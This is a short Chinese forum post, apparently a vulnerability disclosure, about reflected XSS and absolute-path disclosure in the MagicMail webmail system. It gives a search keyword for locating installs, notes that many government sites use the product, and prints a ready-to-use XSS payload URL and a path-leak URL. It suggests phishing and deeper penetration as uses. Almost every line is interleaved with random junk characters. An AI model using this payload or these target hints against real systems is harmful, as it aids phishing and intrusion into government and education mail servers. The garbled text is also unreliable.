今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞, D- G$ D' E2 s; x
2 `" {0 _/ J6 j ! [! p; E A/ g g- F1 ]" W/ B
包含 一个反射性XSS 以及 绝对路径泄漏
2 u1 p3 ~% {; R# Q看了看 貌似全部是linux的。
0 H) X$ Z( ]8 K3 ~* F' E; D$ i
. ?( ]1 i7 H" K2 D关键字:迈捷邮件系统 by MagicMail
/ o+ T3 q/ a5 |8 ?- K& Y4 c
0 Z8 T: P& s7 D- V可以看到很多政府网站都用这个邮件系统
! O4 }: }7 T `& H: s u5 V
8 c& I2 J% o! Q- Z& |: @& U, x绝对路径 http://madman.in/index.php?login_type=declare&language=
0 g3 L% S* }% `/ L$ v( z3 U* \8 I Z* F7 P5 E) ~
4 ] \# j0 v! S- Q9 G @
; c; |/ Y) s3 I Q1 UXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E! L1 a' n7 O- D; c3 S! i
$ a: M8 y/ w0 b& I) H4 Y$ L7 g) d8 J6 p" c, z1 B1 m
K; v/ n/ _6 l- q8 D, _虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等% i0 q3 h! S8 j* J$ t+ N& A
: D+ b/ v- L# ~! ]) m3 \
修复方案:看官方补丁吧。( v4 M! N) z: f( S+ K6 e o
|